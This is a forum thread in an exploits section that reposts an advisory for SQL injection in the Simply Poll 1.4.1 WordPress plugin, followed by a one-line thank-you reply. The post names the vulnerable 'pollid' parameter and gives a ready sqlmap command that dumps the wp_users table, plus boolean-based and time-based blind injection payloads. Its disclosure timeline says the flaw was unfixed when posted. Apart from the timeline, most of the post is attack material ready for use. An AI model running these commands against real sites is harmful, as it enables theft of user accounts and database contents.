Simply Poll 1.4.1 Plugin for WordPress – SQL Injection

Exploiting
Post Reply
User avatar
cardhouse
Posts: 42
Joined: Thu Dec 28, 2017 8:03 pm

Simply Poll 1.4.1 Plugin for WordPress – SQL Injection

Postby cardhouse » Tue Aug 21, 2018 9:30 pm

# Exploit Title: Simply Poll 1.4.1 Plugin for WordPress – SQL Injection
# Date: 21/12/2016
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
# Software Link: https://wordpress.org/plugins/simply-poll/
# Contact: info@tad.group
# Website: http://www.tad.group
# Category: Web Application Exploits

1 - Description

An unescaped parameter was found in Simply Poll version 1.4.1. ( WP
plugin ). An attacker can exploit this vulnerability to read from the
database.
The POST parameter 'pollid' is vulnerable.

2. Proof of Concept

sqlmap -u "http://example.com/wp-admin/admin-ajax.php"
--data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress
--threads=10 --random-agent --dbms=mysql --level=5 --risk=3

Parameter: pollid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=spAjaxResults&pollid=2 AND 6034=6034

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: action=spAjaxResults&pollid=2 AND SLEEP(5)

3. Attack outcome:

An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read & write access the filesystem may be possible.

4 Impact:

Critical

5. Affected versions:

<= 1.4.1

6. Disclosure Timeline:

21-Dec-2016 – found the vulnerability
21-Dec-2016 – informed the developer
28-Dec-2016 – release date of this security advisory

Not fixed at the date of submitting that exploit.
Top
User avatar
AlexB
Posts: 29
Joined: Tue Nov 14, 2017 8:43 pm

Re: Simply Poll 1.4.1 Plugin for WordPress – SQL Injection

Postby AlexB » Fri Nov 30, 2018 5:24 pm

thanks for sharing bro
Top
Post Reply

Return to “Exploits”